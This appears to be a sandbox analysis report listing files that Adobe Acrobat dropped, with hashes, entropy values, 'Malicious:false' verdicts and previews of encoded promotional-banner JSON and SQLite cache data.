                                                                                                                                                                                                                                                                                SHA-256:0D2EF27AD611D792CAAF083B9E2BF0CB2CB5B6A147528AECA20001480A773102
                                                                                                                                                                                                                                                                                SHA-512:7B7F6BB0B49FBC3349A33798925FE769AA5E90D88DFF8C1CBB2E769B52DD69C0044C18A2C56FDA8CC9D342D1BD510BC924A276F12BAD582936BD50137935D748
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):292
                                                                                                                                                                                                                                                                                Entropy (8bit):5.2749159034589095
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfQ1rPeUkwRe9:YvXKXbQXFcTYOGY16Ukee9
                                                                                                                                                                                                                                                                                MD5:56B6FEF9F442779BA9ECB8CB4635ED5E
                                                                                                                                                                                                                                                                                SHA1:6A1CD727DB30EB491F8EBB38CE57F52BB0134F45
                                                                                                                                                                                                                                                                                SHA-256:A35D55BA15429661CA391615F50E2E0608EC6E8C93492F02656F7A7FD3A49AD7
                                                                                                                                                                                                                                                                                SHA-512:EE7C38CE5386D03C18AC80C1CC6C9E5DA44825E1D8571659C245885822860487D20068738770E329D6D6A5BC8D8F6E8575ACC557FFC7C8D412891A94DC7B4AEA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1098
                                                                                                                                                                                                                                                                                Entropy (8bit):5.689015677139516
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6f2LgEFcs2SOGt0nl0RCmK8czOCUaBtCrfSE:Yv4ogq2SrhAh8cvUgEmE
                                                                                                                                                                                                                                                                                MD5:A45CF89EE3D261C7877C61BF9A3C8936
                                                                                                                                                                                                                                                                                SHA1:A94E731D88D991334BE8BC2A4CA34051B59674AF
                                                                                                                                                                                                                                                                                SHA-256:11B4BD655EDC87837CB8BA85EF15FF388561AE8DE4F571A43AEE5EE8BD055C78
                                                                                                                                                                                                                                                                                SHA-512:E74C1F05284CF71B6DFFFC7E45D60A3365240CBF460FE6A7DB7CA07FF0214B092A334FB69EFD3B5C13939445632F95C255A10BB53F3F4CE03E77F5D25ABB6567
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_0","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"abdf1d9d-2114-4953-95a6-4eed783b9872","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlR1cm4gc2Nhbm5lZCBwYXBlciBkb2N1bWVudHNcbmludG8gaW5zdGFudGx5IGVkaXRhYmxlIFBERnMuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNoYWxsZW5nZXIyIn0=","dataTy
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1164
                                                                                                                                                                                                                                                                                Entropy (8bit):5.699821288868723
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6zKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5F:YvwEgqprtrS5OZjSlwTmAfSK3
                                                                                                                                                                                                                                                                                MD5:5F468570F805709C41B0FEB1A8B8D633
                                                                                                                                                                                                                                                                                SHA1:8395EBABCCE76B525C334C8CE4F6DA13F25F0153
                                                                                                                                                                                                                                                                                SHA-256:E5EE68AD1B7CABD2D35F9F2987F0CA91E1F77B3E9414D68E4480048048944EF0
                                                                                                                                                                                                                                                                                SHA-512:CE028ED09C5B351A6F2CF8C7D90D91C73A538A30E9BC1B8082B0E715D507A236F23AC05ED065A47E89C7FA04FEE6F323C8CC1D94BB021F93B8091F3A9B5BEBD5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):289
                                                                                                                                                                                                                                                                                Entropy (8bit):5.279331018222963
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfYdPeUkwRe9:YvXKXbQXFcTYOGg8Ukee9
                                                                                                                                                                                                                                                                                MD5:78AC3C28AD08C4941653424C656552A5
                                                                                                                                                                                                                                                                                SHA1:D622AF31BC85D7FF8552FA5964944CD1EAA799F4
                                                                                                                                                                                                                                                                                SHA-256:8ECDB5E29E56D1B414582BC5D08C48A0BF731E891F1E7AC7DB60779085F15024
                                                                                                                                                                                                                                                                                SHA-512:8ED35EB48A50EDF73A527F981586D81847B3FFB85176E91ABDC8535977D0D4C80BE29862E37B073BB918A32BAD90EBFF3ECA9CCCE0A2E312E60CAA4CAF9F5C3C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1395
                                                                                                                                                                                                                                                                                Entropy (8bit):5.778729015361743
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6OrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNN:Yv/HgDv3W2aYQfgB5OUupHrQ9FJ3
                                                                                                                                                                                                                                                                                MD5:6F98F0F623B333993BF7BE3C2984B2AD
                                                                                                                                                                                                                                                                                SHA1:7631234E8C06B6149C489893091C8674AC56BB12
                                                                                                                                                                                                                                                                                SHA-256:63DFE3457E2508EF3ECC1DC43DDD7694B9EB238D9724F63682ABE4935F6AEEF9
                                                                                                                                                                                                                                                                                SHA-512:2AAB7D66393C7C024FB85FF7BD9D819DD26A48A9B1C251317C1DB7EE2B9F2EFB044E314F15627BA9FC297C11BD0C926DEC06893D5C926175BDBEB0F7FDF8BF37
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                Entropy (8bit):5.263020170754401
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfbPtdPeUkwRe9:YvXKXbQXFcTYOGDV8Ukee9
                                                                                                                                                                                                                                                                                MD5:CBD248AF30268AF1CADF66B7B7342484
                                                                                                                                                                                                                                                                                SHA1:A00CA9F08C708BA202081B1FC34389FFABF5D10A
                                                                                                                                                                                                                                                                                SHA-256:5E2A811CAA080F6FE9626BF0FDF805B8AAAB3D9EB5BA2851866EC0B335E80A97
                                                                                                                                                                                                                                                                                SHA-512:926928749176F11457D840E19B808A03DDE6BA8C1A726191671CF30B04D86C5E8D6FECF7E9761F28E238950B2B36DDE1D8922C5644B7A075842B988A72A94A8B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):287
                                                                                                                                                                                                                                                                                Entropy (8bit):5.266690678247535
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJf21rPeUkwRe9:YvXKXbQXFcTYOG+16Ukee9
                                                                                                                                                                                                                                                                                MD5:7C34A26FD51DEBC5A1BBA59435EBAECC
                                                                                                                                                                                                                                                                                SHA1:92C8F2E1B19A7CC69FE0B4105D73FC56CB1A823E
                                                                                                                                                                                                                                                                                SHA-256:35FFECBEC10FEF236D86F7C609CA7E28FCEAAF379E34911D884E8F7D82FD2FF4
                                                                                                                                                                                                                                                                                SHA-512:A87399AAC3E17459942080E192E6EACB5E50505B813DAD1D9296F6B9FE59DBF442F302BB9425F1DC020B949D89909525BA872E4F6C2F8726EB8665058D1E6978
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1054
                                                                                                                                                                                                                                                                                Entropy (8bit):5.666625017028116
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6EamXayLgE6cTg4QSOGtNaqnl0RCmK8czOC/CrfSE:YvxBgSXQSrOAh8cv6mE
                                                                                                                                                                                                                                                                                MD5:E11DDF2370F0E1440DBFBF54036CEB14
                                                                                                                                                                                                                                                                                SHA1:1BB5CEB15A9FB8E37DF382A004B52810552CABFE
                                                                                                                                                                                                                                                                                SHA-256:A775C15A5EA54726827097E4C07D282AF2504A8882BBC40D9B05D8F22A41C797
                                                                                                                                                                                                                                                                                SHA-512:DC8B39B52C1FC304A5C5D67CEB432C3B9C219840A43C4C859D6B14C423ACFC78B6EA9D6B0504811298109C265ED26263624B6641C889DD8D8186B1558B7B1045
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_1","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"7fe39695-394c-4706-9b50-651e7499d428","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6IlJHUzAzNTEtRU5VLUNoYWxsZW5nZXIyIn0=","dataType":"application\/json","encodingScheme":tru
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                                                Entropy (8bit):5.244947493755788
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfshHHrPeUkwRe9:YvXKXbQXFcTYOGUUUkee9
                                                                                                                                                                                                                                                                                MD5:00CC784D62FCECCE89C4B7E5C5689B96
                                                                                                                                                                                                                                                                                SHA1:2FFCA7EDA9732B265065DC0590DD0D7E3FCD0DF2
                                                                                                                                                                                                                                                                                SHA-256:EB19E91506E4E005442559F9CD9478213068AFB1A8E0633DB2216C3C4D6426A8
                                                                                                                                                                                                                                                                                SHA-512:B01778AFBCF42952D8C6D9B0DD73DD633F98B64D88460B8D93A8BF4464D57B4CD86A75D5E25B81EED787694DCEFA5490BAFC259B0241B28B7B7CAEAE0A36A7A6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):782
                                                                                                                                                                                                                                                                                Entropy (8bit):5.357603409469634
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:YvXKXbQXFcTYOGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWR:Yv6XbC6L168CgEXX5kcIfANhE
                                                                                                                                                                                                                                                                                MD5:28D0449A1A4DCE8F71FDBE54C46167DC
                                                                                                                                                                                                                                                                                SHA1:3042B01B3DE69998CC32DDAE199A0D167582FA92
                                                                                                                                                                                                                                                                                SHA-256:F3780227B62557F777C997A03B0E6C88543A782C4CA6DDDCA32B36B7D677C6BC
                                                                                                                                                                                                                                                                                SHA-512:D5C9D93A72FFD8E35E45AF7339E0CC8B692516814CADC18EE3F25C11D76EC49E6A7FB7377DABE6FC591505DA7D9475D39DBB880FA18A43DF931F3011D1F50CAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1728497189374}}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4
                                                                                                                                                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:e:e
                                                                                                                                                                                                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2818
                                                                                                                                                                                                                                                                                Entropy (8bit):5.130572442942924
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:YQrvFF4Fa6ayyh+jWyCrhErKmOYHqgeRejBwj0SWXAS2Iu2LSgKKcEF5Dz9ouAJj:YQbRaaE7vKyw2XC6lcEF5z9w
                                                                                                                                                                                                                                                                                MD5:76FCA7E079AD5ADFD6C8C63FE15DE310
                                                                                                                                                                                                                                                                                SHA1:8CE4081E3646D267E9F45DC5E30B2DCB41F4E2E6
                                                                                                                                                                                                                                                                                SHA-256:758A390D5A1A66D38D6A3D91DE0792F4D275AAC0859E15C09BB4AB32048E5D8B
                                                                                                                                                                                                                                                                                SHA-512:553BA08A52C7A49F20E0BAE8E9221821071452B62FE4E89905749F8D164774E0DF9C49D059DF2D8DBF27E222F63F313563CE71DA346B6B7C7FC5172C6FFF9C74
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"1548decb00e07010504b01d9cdc2cdcb","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1728497188000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"4fa16bbe71f794cd4ae1f2705a1da406","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1728497188000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ceb2ec1b78e5d37aef845bed4899aa0a","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1054,"ts":1728497188000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"adaa529c64723a685a91c662925fc27f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1091,"ts":1728497188000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"ed322d51d123a74e208b5c450273449c","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1098,"ts":1728497188000},{"id":"Edit_InApp_Aug2020","info":{"dg":"4fbb39071c8618af72df4ff3f5b7f942","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):12288
                                                                                                                                                                                                                                                                                Entropy (8bit):1.146176666795983
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLhx/XYKQvGJF7ursuahTRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUux:TFl2GL7msueXc+XcGNFlRYIX2v3kzA
                                                                                                                                                                                                                                                                                MD5:4232DC4ED6AA0771E1B7652DB2AB2B48
                                                                                                                                                                                                                                                                                SHA1:04996B0410F1DE40E5CBB930F3FC93DACA0893EA
                                                                                                                                                                                                                                                                                SHA-256:EF777AE2D3095E67940E5F7B06C255B075ED42C7D65D31297FEC0C6312F310E1
                                                                                                                                                                                                                                                                                SHA-512:C463E99E03BF4F076C138110873CA82E154516A83A9D67B7F316C300CDB8350556CEDB69826E8098E4F72429B39E063CA1F11292BE7F518C71886DB27E4AE65C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                Entropy (8bit):1.5514247479160415
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:7+t9ahTUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxSpqLxx/h:7M9BXc+XcGNFlRYIX2vVpqVl2GL7msf
                                                                                                                                                                                                                                                                                MD5:824ED80E76B3A05C467E8228677A2713
                                                                                                                                                                                                                                                                                SHA1:7BCB81CF1C0C57C97CEEB3071AFEB4D2522D723F
                                                                                                                                                                                                                                                                                SHA-256:A352AF658A7D4F47353A31CB02FDDA2F231E504A54B87622633921AE6DF658CB
                                                                                                                                                                                                                                                                                SHA-512:4A2D61194A183F8340A8928183324F04FD71C8AB31F0A9787C9B2E012F76A8676E00EDD0DFB1670E1F27AD502FB915B7552F926946E66C22A22B7F91B34DC24A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.... .c........ ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):246
                                                                                                                                                                                                                                                                                Entropy (8bit):3.5177502348333967
                                                                                                                                                                                                                                                                                Encrypted:false
